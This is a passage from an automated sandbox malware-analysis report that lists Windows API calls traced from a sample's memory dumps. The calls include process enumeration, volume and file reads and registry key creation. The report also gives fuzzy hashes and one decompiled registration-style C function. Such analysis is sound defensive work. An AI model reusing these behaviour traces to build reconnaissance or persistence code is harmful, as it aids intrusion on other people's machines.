                                                                                                                                                                                                                                                                                            • Part of subcall function 0252B4E7: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 0252B5A4
                                                                                                                                                                                                                                                                                            • Part of subcall function 02527497: lstrlen.KERNEL32(00000000), ref: 025274B2
                                                                                                                                                                                                                                                                                            • Part of subcall function 02527497: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 025274D7
                                                                                                                                                                                                                                                                                            • Part of subcall function 02527497: GetFileSize.KERNEL32(000000FF,00000000), ref: 025274F0
                                                                                                                                                                                                                                                                                            • Part of subcall function 02527497: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0252750C
                                                                                                                                                                                                                                                                                            • Part of subcall function 02527497: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02527534
                                                                                                                                                                                                                                                                                            • Part of subcall function 02527497: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02527560
                                                                                                                                                                                                                                                                                            • Part of subcall function 02527497: CloseHandle.KERNEL32(000000FF), ref: 0252756A
                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(-0000043B,04013CA0), ref: 02526F7F
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(0400C5B0,?,00000207), ref: 02526FD1
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 02526FF6
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0252701B
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 02527034
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0252705D
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02527097
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 025270D9
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 025270E3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$CloseHandleVirtuallstrlen$Process$AllocCreateFreeModuleNameReadSizeSystemlstrcpy$CurrentDirectoryEnumEnvironmentFirstInfoInformationModulesOpenProcess32VariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 756562979-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8156502d36eb68a2887af8f0818815dc803d5eef6301f09645a3c860774a52c8
                                                                                                                                                                                                                                                                                          • Instruction ID: d43a099257b9548a607596ef614904cf50e4fef544ef73d926874534e2f7815e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8156502d36eb68a2887af8f0818815dc803d5eef6301f09645a3c860774a52c8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB5184B0904214ABEB14DFA4DC99FEE7B34EF48704F048158F7096A2C1D779AA84CF94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(000000FF,00000128,00000002,00000000), ref: 025234B5
                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 02523519
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 0252353F
                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 02523559
                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0252356D
                                                                                                                                                                                                                                                                                          • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 025235A3
                                                                                                                                                                                                                                                                                          • GetModuleFileNameExA.PSAPI(00000000,?,?,?,00000000,?,00000004,00000000), ref: 025235C2
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?,00000004,00000000), ref: 025235E8
                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(000000FF,00000128), ref: 025235FE
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,000000FF,00000128,00000002,00000000), ref: 02523612
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Process$CloseHandleProcess32$CurrentEnumFileFirstModuleModulesNameNextOpenlstrcpylstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2294800487-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                                          • Instruction ID: 07693404dab91e3e852aa2a1c6cee9a2abb354bd86e6d73d2d2546106ce5c740
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A41FE71904228ABDB25DF64CD84BEDB7B9BB49304F0046D9E50DA71D0D738AE88CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(0401434C,0400C5E4), ref: 0252720E
                                                                                                                                                                                                                                                                                            • Part of subcall function 025270F7: CharUpperA.USER32(00000000), ref: 025271A9
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(0401189C), ref: 02527244
                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000000,0401189C), ref: 0252725E
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02527268
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(0401434C), ref: 02527275
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0401434C), ref: 0252728F
                                                                                                                                                                                                                                                                                          • RegCreateKeyExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 025272C7
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 025272D5
                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000000,0400C5F0), ref: 025272F8
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02527302
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4161867159-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 283064f3844920ac37fad9982aeb83bacf8817c67858d829df94773c5d5e6cc7
                                                                                                                                                                                                                                                                                          • Instruction ID: dcf312261174d44cd4a3f322d75b105dbf92ec4dccb54d26cbd45395f12215d1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 283064f3844920ac37fad9982aeb83bacf8817c67858d829df94773c5d5e6cc7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF316075644218BBEB14DFA4DC49FAE7774FB48700F008518FA15AB2C0D779AA44CF94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                          			E000F4380(unsigned int __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                                                                                                          				char _v1314;
                                                                                                                                                                                                                                                                                          				short _v1316;
                                                                                                                                                                                                                                                                                          				char _v2356;
                                                                                                                                                                                                                                                                                          				unsigned int _v2360;
                                                                                                                                                                                                                                                                                          				char _v2364;
                                                                                                                                                                                                                                                                                          				char _v2368;
                                                                                                                                                                                                                                                                                          				CHAR* _v2372;
                                                                                                                                                                                                                                                                                          				CHAR* _v2376;
                                                                                                                                                                                                                                                                                          				CHAR* _v2380;
                                                                                                                                                                                                                                                                                          				CHAR* _v2384;
                                                                                                                                                                                                                                                                                          				CHAR* _v2388;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION _v2392;
                                                                                                                                                                                                                                                                                          				CHAR* _v2396;
                                                                                                                                                                                                                                                                                          				CHAR* _v2400;
                                                                                                                                                                                                                                                                                          				CHAR* _v2404;
                                                                                                                                                                                                                                                                                          				char _v2408;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v2412;
                                                                                                                                                                                                                                                                                          				void* _v2424;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                                                                                                          				unsigned int _t78;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t80;
                                                                                                                                                                                                                                                                                          				long _t81;
                                                                                                                                                                                                                                                                                          				int _t82;
                                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                                          				unsigned int _t90;
                                                                                                                                                                                                                                                                                          				signed int _t95;
                                                                                                                                                                                                                                                                                          				unsigned int _t97;
                                                                                                                                                                                                                                                                                          				unsigned int _t99;
                                                                                                                                                                                                                                                                                          				unsigned int _t103;
                                                                                                                                                                                                                                                                                          				void* _t110;
                                                                                                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                                                                                                          				unsigned int _t145;
                                                                                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t149;
                                                                                                                                                                                                                                                                                          				signed int _t151;
                                                                                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                                                                                          				void* _t154;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t140 = __edx;
                                                                                                                                                                                                                                                                                          				_t70 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t70 ^ _t151;
                                                                                                                                                                                                                                                                                          				_v2392 = 0;
                                                                                                                                                                                                                                                                                          				_v2388 = 0;
                                                                                                                                                                                                                                                                                          				_v2384 = 0;
                                                                                                                                                                                                                                                                                          				_v2380 = 0;
                                                                                                                                                                                                                                                                                          				_v2376 = 0;
                                                                                                                                                                                                                                                                                          				_v2372 = 0;
                                                                                                                                                                                                                                                                                          				_t144 = __ecx;
                                                                                                                                                                                                                                                                                          				_v2360 = __ecx;
                                                                                                                                                                                                                                                                                          				_t146 = __edx;
                                                                                                                                                                                                                                                                                          				_v2408 = 0x112cf0;
                                                                                                                                                                                                                                                                                          				_v2404 = 0;
                                                                                                                                                                                                                                                                                          				_v2400 = 0;
                                                                                                                                                                                                                                                                                          				_v2396 = 0;
                                                                                                                                                                                                                                                                                          				_v2368 = 0;
                                                                                                                                                                                                                                                                                          				if(InitializeCriticalSectionAndSpinCount( &_v2392, 0) != 0) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					_v2368 = 1;
                                                                                                                                                                                                                                                                                          					if(_t146 != 0) {
                                                                                                                                                                                                                                                                                          						_t116 =  *_t146;
                                                                                                                                                                                                                                                                                          						if( *_t146 != 0) {
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								E000F2050( *((intOrPtr*)(_t146 + 4)),  &_v2408,  &_v2408, _t116,  *((intOrPtr*)(_t146 + 4)));
                                                                                                                                                                                                                                                                                          								_t116 =  *(_t146 + 8);
                                                                                                                                                                                                                                                                                          								_t146 = _t146 + 8;
                                                                                                                                                                                                                                                                                          							} while (_t116 != 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t75 =  *_t144;
                                                                                                                                                                                                                                                                                          					_t140 =  *(_t75 + 0x14);
                                                                                                                                                                                                                                                                                          					_t146 =  *( *(_t75 + 0x14))( &_v2408);
                                                                                                                                                                                                                                                                                          					if(_t146 < 0) {
                                                                                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                                                                                          						E000F1F50();
                                                                                                                                                                                                                                                                                          						_t78 = _t146;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t80 =  *0x170c08;
                                                                                                                                                                                                                                                                                          						_v2364 = 0;
                                                                                                                                                                                                                                                                                          						_v2412 = _t80;
                                                                                                                                                                                                                                                                                          						_t81 = GetModuleFileNameA(_t80,  &_v268, 0x104);
                                                                                                                                                                                                                                                                                          						if(_t81 != 0) {
                                                                                                                                                                                                                                                                                          							if(_t81 != 0x104) {
                                                                                                                                                                                                                                                                                          								_t140 =  &_v268;
                                                                                                                                                                                                                                                                                          								_t82 = lstrlenA( &_v268);
                                                                                                                                                                                                                                                                                          								_t128 =  &_v2360;
                                                                                                                                                                                                                                                                                          								_v2360 = _t82 + 1;
                                                                                                                                                                                                                                                                                          								_t84 = E000F1000(_t82 + 1,  &_v268,  &_v2360);
                                                                                                                                                                                                                                                                                          								_t154 = _t152 + 4;
                                                                                                                                                                                                                                                                                          								if(_t84 < 0) {
                                                                                                                                                                                                                                                                                          									L20:
                                                                                                                                                                                                                                                                                          									_t146 =  &_v2364;
                                                                                                                                                                                                                                                                                          									E000FA200( &_v2364);
                                                                                                                                                                                                                                                                                          									E000F1F50();
                                                                                                                                                                                                                                                                                          									_t78 = 0x8007000e;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t145 = _v2360;
                                                                                                                                                                                                                                                                                          									if(_t145 > 0x400) {
                                                                                                                                                                                                                                                                                          										L18:
                                                                                                                                                                                                                                                                                          										_t148 = E000FA1D0(_t145, _t128, _t145,  &_v2364);
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t110 = E000F1030( &_v2360,  &_v268, _t145);
                                                                                                                                                                                                                                                                                          										_t154 = _t154 + 4;
                                                                                                                                                                                                                                                                                          										if(_t110 == 0) {
                                                                                                                                                                                                                                                                                          											goto L18;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											E0010ACA0(_t145);
                                                                                                                                                                                                                                                                                          											_t148 = _t154;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t140 = _t145 >> 1;
                                                                                                                                                                                                                                                                                          									_t90 = E000F10E0( &_v268, _t145 >> 1, _t148, 3);
                                                                                                                                                                                                                                                                                          									_t144 = _t90;
                                                                                                                                                                                                                                                                                          									if(_t90 != 0) {
                                                                                                                                                                                                                                                                                          										_t130 =  &_v2356;
                                                                                                                                                                                                                                                                                          										E000F1620(_t144,  &_v2356, 0x208);
                                                                                                                                                                                                                                                                                          										_t149 = _v2412;
                                                                                                                                                                                                                                                                                          										if(_t149 == 0 || _t149 == GetModuleHandleA(0)) {
                                                                                                                                                                                                                                                                                          											_t140 =  &_v1314;
                                                                                                                                                                                                                                                                                          											_v1316 = 0x22;
                                                                                                                                                                                                                                                                                          											if(E000F1140( &_v2356,  &_v1314) != 0) {
                                                                                                                                                                                                                                                                                          												_t95 = lstrlenW( &_v1316);
                                                                                                                                                                                                                                                                                          												_t140 = 0;
                                                                                                                                                                                                                                                                                          												 *((short*)(_t151 + _t95 * 2 - 0x520)) = 0x22;
                                                                                                                                                                                                                                                                                          												 *((short*)(_t151 + _t95 * 2 - 0x51e)) = 0;
                                                                                                                                                                                                                                                                                          												_push( &_v1316);
                                                                                                                                                                                                                                                                                          												_push(L"Module");
                                                                                                                                                                                                                                                                                          												_t130 =  &_v2408;
                                                                                                                                                                                                                                                                                          												_push( &_v2408);
                                                                                                                                                                                                                                                                                          												goto L27;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t146 =  &_v2364;
                                                                                                                                                                                                                                                                                          												E000FA200( &_v2364);
                                                                                                                                                                                                                                                                                          												E000F1F50();
                                                                                                                                                                                                                                                                                          												_t78 = 0x80004005;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t140 =  &_v2356;
                                                                                                                                                                                                                                                                                          											_push( &_v2356);
                                                                                                                                                                                                                                                                                          											_push(L"Module");
                                                                                                                                                                                                                                                                                          											_push( &_v2408);
                                                                                                                                                                                                                                                                                          											L27:
                                                                                                                                                                                                                                                                                          											_t97 = E000F2050(_t130, _t140);
                                                                                                                                                                                                                                                                                          											_v2360 = _t97;
                                                                                                                                                                                                                                                                                          											if(_t97 >= 0) {
                                                                                                                                                                                                                                                                                          												_t140 =  &_v2356;
                                                                                                                                                                                                                                                                                          												_t99 = E000F2050(_t130,  &_v2356,  &_v2408, L"Module_Raw",  &_v2356);
                                                                                                                                                                                                                                                                                          												_v2360 = _t99;
                                                                                                                                                                                                                                                                                          												if(_t99 < 0) {
                                                                                                                                                                                                                                                                                          													goto L28;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													if(_a8 == 0) {
                                                                                                                                                                                                                                                                                          														_t103 = E000F27A0( &_v2408,  &_v2356,  &_v2408, _t144, _a4);
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_t140 =  &_v2408;
                                                                                                                                                                                                                                                                                          														_t103 = E000F24C0(_a4,  &_v2408,  &_v2408, _t144, _a4);
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_t146 =  &_v2364;
                                                                                                                                                                                                                                                                                          													_t144 = _t103;
                                                                                                                                                                                                                                                                                          													E000FA200( &_v2364);
                                                                                                                                                                                                                                                                                          													goto L34;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												L28:
                                                                                                                                                                                                                                                                                          												_t146 =  &_v2364;
                                                                                                                                                                                                                                                                                          												E000FA200( &_v2364);
                                                                                                                                                                                                                                                                                          												E000F1F50();
                                                                                                                                                                                                                                                                                          												_t78 = _v2360;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										goto L20;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t146 =  &_v2364;
                                                                                                                                                                                                                                                                                          								E000FA200( &_v2364);
                                                                                                                                                                                                                                                                                          								E000F1F50();
                                                                                                                                                                                                                                                                                          								_t78 = 0x8007007a;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t146 = E000F13E0();
                                                                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t118 = GetLastError();
                                                                                                                                                                                                                                                                                          					if(_t118 > 0) {
                                                                                                                                                                                                                                                                                          						_t118 = _t118 & 0x0000ffff | 0x80070000;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t144 = _t118;
                                                                                                                                                                                                                                                                                          					if(_t144 < 0) {
                                                                                                                                                                                                                                                                                          						L34:
                                                                                                                                                                                                                                                                                          						E000F1F50();
                                                                                                                                                                                                                                                                                          						_t78 = _t144;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t144 = _v2360;
                                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E001059E6(_t78, 0, _v8 ^ _t151, _t140, _t144, _t146);
                                                                                                                                                                                                                                                                                          			}














































                                                                                                                                                                                                                                                                                          0x000f4380
                                                                                                                                                                                                                                                                                          0x000f4389
                                                                                                                                                                                                                                                                                          0x000f4390
                                                                                                                                                                                                                                                                                          0x000f439a
                                                                                                                                                                                                                                                                                          0x000f43a0
                                                                                                                                                                                                                                                                                          0x000f43a6
                                                                                                                                                                                                                                                                                          0x000f43ac
                                                                                                                                                                                                                                                                                          0x000f43b2
                                                                                                                                                                                                                                                                                          0x000f43b8
                                                                                                                                                                                                                                                                                          0x000f43c5
                                                                                                                                                                                                                                                                                          0x000f43c8
                                                                                                                                                                                                                                                                                          0x000f43ce
                                                                                                                                                                                                                                                                                          0x000f43d0
                                                                                                                                                                                                                                                                                          0x000f43da
                                                                                                                                                                                                                                                                                          0x000f43e0
                                                                                                                                                                                                                                                                                          0x000f43e6
                                                                                                                                                                                                                                                                                          0x000f43ec
                                                                                                                                                                                                                                                                                          0x000f43fa
                                                                                                                                                                                                                                                                                          0x000f4420
                                                                                                                                                                                                                                                                                          0x000f4420
                                                                                                                                                                                                                                                                                          0x000f4429
                                                                                                                                                                                                                                                                                          0x000f442b
                                                                                                                                                                                                                                                                                          0x000f442f
                                                                                                                                                                                                                                                                                          0x000f4431
                                                                                                                                                                                                                                                                                          0x000f443d
                                                                                                                                                                                                                                                                                          0x000f4442
                                                                                                                                                                                                                                                                                          0x000f4445
                                                                                                                                                                                                                                                                                          0x000f4448
                                                                                                                                                                                                                                                                                          0x000f4431
                                                                                                                                                                                                                                                                                          0x000f442f
                                                                                                                                                                                                                                                                                          0x000f444c
                                                                                                                                                                                                                                                                                          0x000f444e
                                                                                                                                                                                                                                                                                          0x000f445c
                                                                                                                                                                                                                                                                                          0x000f4460
                                                                                                                                                                                                                                                                                          0x000f4491
                                                                                                                                                                                                                                                                                          0x000f4497
                                                                                                                                                                                                                                                                                          0x000f449c
                                                                                                                                                                                                                                                                                          0x000f4462
                                                                                                                                                                                                                                                                                          0x000f4462
                                                                                                                                                                                                                                                                                          0x000f4474
                                                                                                                                                                                                                                                                                          0x000f447a
                                                                                                                                                                                                                                                                                          0x000f4480
                                                                                                                                                                                                                                                                                          0x000f4488
                                                                                                                                                                                                                                                                                          0x000f44a8
                                                                                                                                                                                                                                                                                          0x000f44ca
                                                                                                                                                                                                                                                                                          0x000f44d1
                                                                                                                                                                                                                                                                                          0x000f44d7
                                                                                                                                                                                                                                                                                          0x000f44df
                                                                                                                                                                                                                                                                                          0x000f44e5
                                                                                                                                                                                                                                                                                          0x000f44ea
                                                                                                                                                                                                                                                                                          0x000f44ef
                                                                                                                                                                                                                                                                                          0x000f453d
                                                                                                                                                                                                                                                                                          0x000f453d
                                                                                                                                                                                                                                                                                          0x000f4543
                                                                                                                                                                                                                                                                                          0x000f454e
                                                                                                                                                                                                                                                                                          0x000f4553
                                                                                                                                                                                                                                                                                          0x000f44f1
                                                                                                                                                                                                                                                                                          0x000f44f1
                                                                                                                                                                                                                                                                                          0x000f44fd
                                                                                                                                                                                                                                                                                          0x000f4517
                                                                                                                                                                                                                                                                                          0x000f4524
                                                                                                                                                                                                                                                                                          0x000f44ff
                                                                                                                                                                                                                                                                                          0x000f4500
                                                                                                                                                                                                                                                                                          0x000f4505
                                                                                                                                                                                                                                                                                          0x000f450a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f450c
                                                                                                                                                                                                                                                                                          0x000f450e
                                                                                                                                                                                                                                                                                          0x000f4513
                                                                                                                                                                                                                                                                                          0x000f4513
                                                                                                                                                                                                                                                                                          0x000f450a
                                                                                                                                                                                                                                                                                          0x000f452a
                                                                                                                                                                                                                                                                                          0x000f4532
                                                                                                                                                                                                                                                                                          0x000f4537
                                                                                                                                                                                                                                                                                          0x000f453b
                                                                                                                                                                                                                                                                                          0x000f4564
                                                                                                                                                                                                                                                                                          0x000f456a
                                                                                                                                                                                                                                                                                          0x000f456f
                                                                                                                                                                                                                                                                                          0x000f4577
                                                                                                                                                                                                                                                                                          0x000f4599
                                                                                                                                                                                                                                                                                          0x000f45ab
                                                                                                                                                                                                                                                                                          0x000f45bc
                                                                                                                                                                                                                                                                                          0x000f45e5
                                                                                                                                                                                                                                                                                          0x000f45f0
                                                                                                                                                                                                                                                                                          0x000f45f2
                                                                                                                                                                                                                                                                                          0x000f45fa
                                                                                                                                                                                                                                                                                          0x000f4608
                                                                                                                                                                                                                                                                                          0x000f4609
                                                                                                                                                                                                                                                                                          0x000f460e
                                                                                                                                                                                                                                                                                          0x000f4614
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f45be
                                                                                                                                                                                                                                                                                          0x000f45be
                                                                                                                                                                                                                                                                                          0x000f45c4
                                                                                                                                                                                                                                                                                          0x000f45cf
                                                                                                                                                                                                                                                                                          0x000f45d4
                                                                                                                                                                                                                                                                                          0x000f45d4
                                                                                                                                                                                                                                                                                          0x000f4584
                                                                                                                                                                                                                                                                                          0x000f4584
                                                                                                                                                                                                                                                                                          0x000f458a
                                                                                                                                                                                                                                                                                          0x000f458b
                                                                                                                                                                                                                                                                                          0x000f4596
                                                                                                                                                                                                                                                                                          0x000f4615
                                                                                                                                                                                                                                                                                          0x000f4615
                                                                                                                                                                                                                                                                                          0x000f461a
                                                                                                                                                                                                                                                                                          0x000f4622
                                                                                                                                                                                                                                                                                          0x000f4642
                                                                                                                                                                                                                                                                                          0x000f4655
                                                                                                                                                                                                                                                                                          0x000f465a
                                                                                                                                                                                                                                                                                          0x000f4662
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4664
                                                                                                                                                                                                                                                                                          0x000f4667
                                                                                                                                                                                                                                                                                          0x000f4688
                                                                                                                                                                                                                                                                                          0x000f4669
                                                                                                                                                                                                                                                                                          0x000f466e
                                                                                                                                                                                                                                                                                          0x000f4675
                                                                                                                                                                                                                                                                                          0x000f4675
                                                                                                                                                                                                                                                                                          0x000f468d
                                                                                                                                                                                                                                                                                          0x000f4693
                                                                                                                                                                                                                                                                                          0x000f4695
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4695
                                                                                                                                                                                                                                                                                          0x000f4624
                                                                                                                                                                                                                                                                                          0x000f4624
                                                                                                                                                                                                                                                                                          0x000f4624
                                                                                                                                                                                                                                                                                          0x000f462a
                                                                                                                                                                                                                                                                                          0x000f4635
                                                                                                                                                                                                                                                                                          0x000f463a
                                                                                                                                                                                                                                                                                          0x000f463a
                                                                                                                                                                                                                                                                                          0x000f4622
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f453b
                                                                                                                                                                                                                                                                                          0x000f44aa
                                                                                                                                                                                                                                                                                          0x000f44aa
                                                                                                                                                                                                                                                                                          0x000f44b0
                                                                                                                                                                                                                                                                                          0x000f44bb
                                                                                                                                                                                                                                                                                          0x000f44c0
                                                                                                                                                                                                                                                                                          0x000f44c0
                                                                                                                                                                                                                                                                                          0x000f448a
                                                                                                                                                                                                                                                                                          0x000f448f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f448f
                                                                                                                                                                                                                                                                                          0x000f4488
                                                                                                                                                                                                                                                                                          0x000f43fc
                                                                                                                                                                                                                                                                                          0x000f43fc
                                                                                                                                                                                                                                                                                          0x000f4404
                                                                                                                                                                                                                                                                                          0x000f440b
                                                                                                                                                                                                                                                                                          0x000f440b
                                                                                                                                                                                                                                                                                          0x000f4410
                                                                                                                                                                                                                                                                                          0x000f4414
                                                                                                                                                                                                                                                                                          0x000f469a
                                                                                                                                                                                                                                                                                          0x000f46a0
                                                                                                                                                                                                                                                                                          0x000f46a5
                                                                                                                                                                                                                                                                                          0x000f441a
                                                                                                                                                                                                                                                                                          0x000f441a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f441a
                                                                                                                                                                                                                                                                                          0x000f4414
                                                                                                                                                                                                                                                                                          0x000f46bd

                                                                                                                                                                                                                                                                                          APIs
